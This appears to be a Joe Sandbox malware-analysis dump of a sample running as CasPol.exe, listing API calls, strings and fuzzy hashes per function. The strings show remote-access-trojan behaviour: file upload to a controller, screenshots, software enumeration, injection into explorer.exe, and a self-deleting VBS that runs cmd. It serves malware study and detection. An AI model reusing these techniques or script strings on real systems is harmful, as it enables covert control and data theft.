                                                                                            • _wcslen.LIBCMT ref: 0041B2DB
                                                                                            • FindVolumeClose.KERNEL32(?), ref: 0041B2FB
                                                                                            • GetLastError.KERNEL32 ref: 0041B313
                                                                                            • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B340
                                                                                            • lstrcatW.KERNEL32(?,?), ref: 0041B359
                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 0041B368
                                                                                            • GetLastError.KERNEL32 ref: 0041B370
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                            • String ID: ?
                                                                                            • API String ID: 3941738427-1684325040
                                                                                            • Opcode ID: d489e3e95fd4da7a256b353d04e65c95c699bf3c253225e66008eb700c534145
                                                                                            • Instruction ID: 2e0df54dd889987763cd5022c3700ac4418931210c184d5857636408485aa128
                                                                                            • Opcode Fuzzy Hash: d489e3e95fd4da7a256b353d04e65c95c699bf3c253225e66008eb700c534145
                                                                                            • Instruction Fuzzy Hash: 8B416F71508305AAD7209FA1EC8C9EBB7E8EB49715F00096BF541C2261EB78C98887D6
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free$EnvironmentVariable$_wcschr
                                                                                            • String ID:
                                                                                            • API String ID: 3899193279-0
                                                                                            • Opcode ID: 6267e3def292f84dd9e33adbac7387806370fb3e846e7c9bec72720c454fd2de
                                                                                            • Instruction ID: 8ac3cd9939a067627e1c481289c57a7f9f94b657261427fab31af25724b0c78e
                                                                                            • Opcode Fuzzy Hash: 6267e3def292f84dd9e33adbac7387806370fb3e846e7c9bec72720c454fd2de
                                                                                            • Instruction Fuzzy Hash: 96D13C719007007FFB25AF7B9881A6F7BA4BF02314F0541AFF905A7381E63989418B9D
                                                                                            APIs
                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                                                                              • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,75573530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                              • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                              • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                            • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                                                                                            • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                                                                                            • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                                                                                            • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                                                                                            • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                                                                                            • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                                                                                            • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                                                                                            • Sleep.KERNEL32(00000064), ref: 00412060
                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                            • String ID: /stext "$HDG$HDG$>G$>G
                                                                                            • API String ID: 1223786279-3931108886
                                                                                            • Opcode ID: 58c85a797d0b0d51052fc17ae47431b6712fc9cdcd63165aa872d0404d50a504
                                                                                            • Instruction ID: 1febf249a593eb43810efab42e14b6693ac358e03ba90545e56d33427da79e18
                                                                                            • Opcode Fuzzy Hash: 58c85a797d0b0d51052fc17ae47431b6712fc9cdcd63165aa872d0404d50a504
                                                                                            • Instruction Fuzzy Hash: 960243315083414AC325FB61D891AEFB7D5AFD4308F50493FF88A931E2EF785A49C69A
                                                                                            APIs
                                                                                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                            • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                            • LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                            • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                            • API String ID: 2490988753-744132762
                                                                                            • Opcode ID: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                                            • Instruction ID: a4547f3d416e9253f7b1cbdd0907a67efdadb69b2b53743d1710677937ed8fa2
                                                                                            • Opcode Fuzzy Hash: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                                            • Instruction Fuzzy Hash: 6D31C4B1906315A7D320AF25DC44ACBB7ECEF44745F400A2AF844D3201D778DA858AEE
                                                                                            APIs
                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B846
                                                                                            • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B88A
                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0041BB54
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseEnumOpen
                                                                                            • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                            • API String ID: 1332880857-3714951968
                                                                                            • Opcode ID: 6f9d8f0674dc0a37181ba86e51d6a92751e66a7c9b2afbb440473ff198e35625
                                                                                            • Instruction ID: 4ca6cd9db44c7b11bab16217f2b7ba144dfc64e74838f3250c32f9e768a6938f
                                                                                            • Opcode Fuzzy Hash: 6f9d8f0674dc0a37181ba86e51d6a92751e66a7c9b2afbb440473ff198e35625
                                                                                            • Instruction Fuzzy Hash: 8C812E311082449BD324EB11DC51AEFB7E9FFD4314F10493FB58A921E1EF74AA49CA9A
                                                                                            APIs
                                                                                            • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAE9
                                                                                            • GetCursorPos.USER32(?), ref: 0041CAF8
                                                                                            • SetForegroundWindow.USER32(?), ref: 0041CB01
                                                                                            • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB1B
                                                                                            • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB6C
                                                                                            • ExitProcess.KERNEL32 ref: 0041CB74
                                                                                            • CreatePopupMenu.USER32 ref: 0041CB7A
                                                                                            • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB8F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                            • String ID: Close
                                                                                            • API String ID: 1657328048-3535843008
                                                                                            • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                            • Instruction ID: a66ed96c0d91d71762f770de87d5f41dd37c70c4e97b210e23d221b2b7ccacbc
                                                                                            • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                            • Instruction Fuzzy Hash: 68212B71188209FFDB064F64FD4EAAA3F65EB04342F044135B906D40B2D7B9EA90EB18
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free$Info
                                                                                            • String ID:
                                                                                            • API String ID: 2509303402-0
                                                                                            • Opcode ID: 92603ff5876a01059927d2e021ea2dcfde124e6bc6800bb968541682ce1897e5
                                                                                            • Instruction ID: 0af7f9009007d8880989bd470fdb3e4a62bb8e65dbd2af1b74ff5c8893cb1db7
                                                                                            • Opcode Fuzzy Hash: 92603ff5876a01059927d2e021ea2dcfde124e6bc6800bb968541682ce1897e5
                                                                                            • Instruction Fuzzy Hash: D0B18F71900605AFEF11DFA9C881BEEBBF4BF49304F14406EF855B7242DA79A8458B64
                                                                                            APIs
                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                                                                                            • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                                                            • __aulldiv.LIBCMT ref: 00407FE9
                                                                                            • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                                                            • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                                                            • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                                                            • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                                                                                            • API String ID: 1884690901-3066803209
                                                                                            • Opcode ID: 1775096831c7832b04362d5365a21c36005818d65dadadce0cd3a8e403c71fb6
                                                                                            • Instruction ID: 222450ca6543349723abdfa1177da379b39b5876d7444fbb960ea0ab75079841
                                                                                            • Opcode Fuzzy Hash: 1775096831c7832b04362d5365a21c36005818d65dadadce0cd3a8e403c71fb6
                                                                                            • Instruction Fuzzy Hash: DAB191316083409BC214FB25C892AAFB7E5AFD4314F40492EF885632D2EF789945C79B
                                                                                            APIs
                                                                                            • ___free_lconv_mon.LIBCMT ref: 004500B1
                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F300
                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F312
                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F324
                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F336
                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F348
                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F35A
                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F36C
                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F37E
                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F390
                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3A2
                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3B4
                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3C6
                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3D8
                                                                                            • _free.LIBCMT ref: 004500A6
                                                                                              • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                            • _free.LIBCMT ref: 004500C8
                                                                                            • _free.LIBCMT ref: 004500DD
                                                                                            • _free.LIBCMT ref: 004500E8
                                                                                            • _free.LIBCMT ref: 0045010A
                                                                                            • _free.LIBCMT ref: 0045011D
                                                                                            • _free.LIBCMT ref: 0045012B
                                                                                            • _free.LIBCMT ref: 00450136
                                                                                            • _free.LIBCMT ref: 0045016E
                                                                                            • _free.LIBCMT ref: 00450175
                                                                                            • _free.LIBCMT ref: 00450192
                                                                                            • _free.LIBCMT ref: 004501AA
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                            • String ID:
                                                                                            • API String ID: 161543041-0
                                                                                            • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                            • Instruction ID: 6df0fc8d0da410edbfddc8482cd9dc810a80ebbb5b2f86b8c24a0bb33e3d08c7
                                                                                            • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                            • Instruction Fuzzy Hash: 96317235500B00AFEB20AA35D845B5B73E5AF42355F15841FF849E7292DF39AC98CB1A
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 0041912D
                                                                                            • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041915F
                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191EB
                                                                                            • Sleep.KERNEL32(000003E8), ref: 0041926D
                                                                                            • GetLocalTime.KERNEL32(?), ref: 0041927C
                                                                                            • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419365
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                            • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                            • API String ID: 489098229-65789007
                                                                                            • Opcode ID: ba05b3bf59bebc49e008883ba20c21b5104beaeaeb09df6dbf273ce008c150d2
                                                                                            • Instruction ID: b922dce7c629cfc9b1bb11cb74a08c0e3353b39699bf4d86e46594d10c943285
                                                                                            • Opcode Fuzzy Hash: ba05b3bf59bebc49e008883ba20c21b5104beaeaeb09df6dbf273ce008c150d2
                                                                                            • Instruction Fuzzy Hash: 33519F71A002449ACB14BBB5C856AFE7BA9AB55304F00407FF84AB71D2EF3C5E85C799
                                                                                            APIs
                                                                                              • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                              • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                              • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                              • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                              • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D
                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                                                                                            • ExitProcess.KERNEL32 ref: 0040C832
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                            • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                            • API String ID: 1913171305-390638927
                                                                                            • Opcode ID: 6d8cdf771420d98c490a7d990fc142cdd0567f39efc4d8d43d0c3b0d415d574d
                                                                                            • Instruction ID: a795a6540db69397e2c5d2b70f340dd787df27bacd58b350937fb1c0aad7b7c4
                                                                                            • Opcode Fuzzy Hash: 6d8cdf771420d98c490a7d990fc142cdd0567f39efc4d8d43d0c3b0d415d574d
                                                                                            • Instruction Fuzzy Hash: A2416D329001185ACB14F762DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free
                                                                                            • String ID:
                                                                                            • API String ID: 269201875-0
                                                                                            • Opcode ID: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                            • Instruction ID: 48066223020562dfe8895eb3edc0e70975ef38ab3c96fc6f1fb07286cb8ca08d
                                                                                            • Opcode Fuzzy Hash: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                            • Instruction Fuzzy Hash: 2BC15772D80204BFEB20DBA9CC82FDE77F89B45704F15416AFA04FB282D6749D458B58
                                                                                            APIs
                                                                                              • Part of subcall function 00454650: CreateFileW.KERNEL32(00000000,?,?,+JE,?,?,00000000,?,00454A2B,00000000,0000000C), ref: 0045466D
                                                                                            • GetLastError.KERNEL32 ref: 00454A96
                                                                                            • __dosmaperr.LIBCMT ref: 00454A9D
                                                                                            • GetFileType.KERNEL32(00000000), ref: 00454AA9
                                                                                            • GetLastError.KERNEL32 ref: 00454AB3
                                                                                            • __dosmaperr.LIBCMT ref: 00454ABC
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00454ADC
                                                                                            • CloseHandle.KERNEL32(?), ref: 00454C26
                                                                                            • GetLastError.KERNEL32 ref: 00454C58
                                                                                            • __dosmaperr.LIBCMT ref: 00454C5F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                            • String ID: H
                                                                                            • API String ID: 4237864984-2852464175
                                                                                            • Opcode ID: 43154248a50fd66e96ac6d70bada307b7577a7ac671062952f04f408382b00d8
                                                                                            • Instruction ID: 324c09394b40af715295ff654573b8bda7a64cd12b4111e7ce26936e53f9a861
                                                                                            • Opcode Fuzzy Hash: 43154248a50fd66e96ac6d70bada307b7577a7ac671062952f04f408382b00d8
                                                                                            • Instruction Fuzzy Hash: B0A148329041044FDF19EF78D8427AE7BA0AB86319F14015EFC159F392DB398C86C75A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 65535$udp
                                                                                            • API String ID: 0-1267037602
                                                                                            • Opcode ID: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                                                            • Instruction ID: a76ad32841e4dbbb66723cf4e0556afe3febbbe66cdf8f55616d13ac9502c32b
                                                                                            • Opcode Fuzzy Hash: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                                                            • Instruction Fuzzy Hash: 9D4118716083019BD7209F29E905BAB7BD8EF85706F04082FF84197391E76DCEC186AE
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393B9
                                                                                            • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C6
                                                                                            • __dosmaperr.LIBCMT ref: 004393CD
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393F9
                                                                                            • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439403
                                                                                            • __dosmaperr.LIBCMT ref: 0043940A
                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043944D
                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439457
                                                                                            • __dosmaperr.LIBCMT ref: 0043945E
                                                                                            • _free.LIBCMT ref: 0043946A
                                                                                            • _free.LIBCMT ref: 00439471
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                            • String ID:
                                                                                            • API String ID: 2441525078-0
                                                                                            • Opcode ID: 684e6fef7141b114c3b5ff973dde56bcea396d28ee1fdac90182f4155713f89e
                                                                                            • Instruction ID: 902c93592471d116807dca9985149206a76c62e8192f2f9a6cc20a0486345b12
                                                                                            • Opcode Fuzzy Hash: 684e6fef7141b114c3b5ff973dde56bcea396d28ee1fdac90182f4155713f89e
                                                                                            • Instruction Fuzzy Hash: F531F17140820ABBEF11AFA5DC449AF3B78EF09364F14016AF81066291DB79CC12DBA9
                                                                                            APIs
                                                                                            • SetEvent.KERNEL32(?,?), ref: 00404E71
                                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                                                            • TranslateMessage.USER32(?), ref: 00404F30
                                                                                            • DispatchMessageA.USER32(?), ref: 00404F3B
                                                                                            • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
                                                                                            • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                            • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                            • API String ID: 2956720200-749203953
                                                                                            • Opcode ID: 6f651fd5f109b797e8f598c57557918727e3d06f0053d4f4d1d309eb53a549ed
                                                                                            • Instruction ID: a70547b48422ce96676d24762269450ce3f1821fc9982c67352fb5fd346d99ba
                                                                                            • Opcode Fuzzy Hash: 6f651fd5f109b797e8f598c57557918727e3d06f0053d4f4d1d309eb53a549ed
                                                                                            • Instruction Fuzzy Hash: F741BFB16043016BC714FB75DC5A8AE77A9ABC1714F40093EF906A31E6EF38DA05C79A
                                                                                            APIs
                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                                                                                            • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                                                                                            • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                                                            • String ID: <$@$@FG$@FG$Temp
                                                                                            • API String ID: 1107811701-2245803885
                                                                                            • Opcode ID: c1b60abd8b62dcba904cfb68a13a900497af3fb008715fd0d20885aad6260c29
                                                                                            • Instruction ID: 21bac8b1790940aaec7d6d8591dec239f7d6dde33bc15b5890dc9a9e7f2861e5
                                                                                            • Opcode Fuzzy Hash: c1b60abd8b62dcba904cfb68a13a900497af3fb008715fd0d20885aad6260c29
                                                                                            • Instruction Fuzzy Hash: E8319C319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(00474A28,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                                                                                            • GetCurrentProcess.KERNEL32(00474A28,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe), ref: 00406705
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CurrentProcess
                                                                                            • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
                                                                                            • API String ID: 2050909247-4145329354
                                                                                            • Opcode ID: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
                                                                                            • Instruction ID: 423827b33d6c667fb1d0fc3afb55bdad30249121d517be796f0b9763ce16cf58
                                                                                            • Opcode Fuzzy Hash: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
                                                                                            • Instruction Fuzzy Hash: B2310871250700AFC300AB65EC45F6A37B8EB84716F11043EF50AE76E1EB79A8508B6D
                                                                                            APIs
                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419C94
                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CAB
